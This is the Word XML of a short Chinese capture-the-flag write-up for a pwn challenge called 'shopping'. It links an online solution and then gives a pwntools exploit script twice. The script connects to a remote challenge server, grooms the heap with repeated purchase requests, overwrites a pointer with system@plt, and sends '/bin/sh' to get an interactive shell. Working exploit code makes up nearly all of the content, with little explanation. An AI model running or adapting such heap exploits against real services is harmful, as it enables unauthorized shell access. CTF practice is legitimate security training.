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/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Pwn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>+shopping</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解题思路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bookmarkStart w:id="0" w:name="X232cc94f33c9fa83f4de303d15c880776646a90"/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发现貌似网上有这道题，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fldChar w:fldCharType="begin"/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instrText xml:space="preserve"> HYPERLINK "https://blog.csdn.net/seaaseesa/article/details/107597557" \h </w:instrTex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fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria" w:cs="Times New Roman"/>
          <w:color w:val="4F81BD"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>https://blog.csdn.net/seaaseesa/article/details/107597557</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria" w:cs="Times New Roman"/>
          <w:color w:val="4F81BD"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/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3030220"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="18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3059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直接改一改字符串接收就好了</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:wordWrap w:val="0"/>
        <w:spacing w:after="20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from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pwn </w:t>
      </w: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import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*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sh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remote(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"182.92.237.102"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10019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elf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ELF(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'./pwn'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system_plt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elf.plt[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'system'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]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sh.sendlineafter(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'Enter the password:'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"I'm ready for shopping\n"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def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add(size, n, content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):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sh.sendlineafter(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'Action:'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'1'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sh.sendlineafter(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'Item ID: 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str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(size))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sh.sendlineafter(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'Quantity: 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str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(n))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if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content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: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sh.sendlineafter(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'Add gift message? (0/1):'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'0'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else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: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sh.sendlineafter(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'Add gift message? (0/1):'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'1'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sh.sendafter(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'Message: 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, content)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for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i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in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range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12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):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add(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0x4000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1000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add(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0x4000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262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b'0'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*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0x3FF0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payload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b'1'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*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0x50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p32(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)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p32(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3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)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10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*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p64(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0x60201d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sleep(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2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sh.send(payload)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sleep(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2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payload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b'/bin/sh'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.ljust(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0xB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b'\x00'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)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p64(system_plt)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payload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payload.ljust(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0x60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b'b'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add(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0x60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, payload)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sh.interactive()</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="0"/>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>E</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>xp</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:wordWrap w:val="0"/>
        <w:spacing w:after="20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from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pwn </w:t>
      </w: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import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*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sh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remote(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"182.92.237.102"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10019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elf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ELF(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'./pwn'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system_plt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elf.plt[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'system'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]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sh.sendlineafter(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'Enter the password:'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"I'm ready for shopping\n"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def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add(size, n, content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):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sh.sendlineafter(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'Action:'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'1'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sh.sendlineafter(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'Item ID: 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str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(size))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sh.sendlineafter(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'Quantity: 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str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(n))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if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content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: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sh.sendlineafter(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'Add gift message? (0/1):'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'0'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else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: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sh.sendlineafter(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'Add gift message? (0/1):'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'1'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sh.sendafter(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'Message: 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, content)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for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i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in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range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12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):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add(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0x4000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1000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add(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0x4000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262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b'0'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*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0x3FF0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payload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b'1'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*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0x50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p32(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)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p32(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3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)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10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*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p64(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0x60201d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sleep(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2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sh.send(payload)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sleep(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2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payload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b'/bin/sh'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.ljust(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0xB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b'\x00'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)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p64(system_plt)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payload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payload.ljust(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0x60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b'b'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add(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0x60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, payload)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sh.interactive()</w:t>
      </w:r>
    </w:p>
    <w:p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48E8561E"/>
    <w:rsid w:val="7AF75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autoRedefine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0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2"/>
    <w:autoRedefine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9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0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1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2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</Words>
  <Characters>126</Characters>
  <Lines>1</Lines>
  <Paragraphs>1</Paragraphs>
  <TotalTime>0</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>146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2024-05-14T03:40:20Z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8A1622788A21446B9DEFDC283569BEE9_12</vt:lpwstr>
  </property>
</Properties>
</file>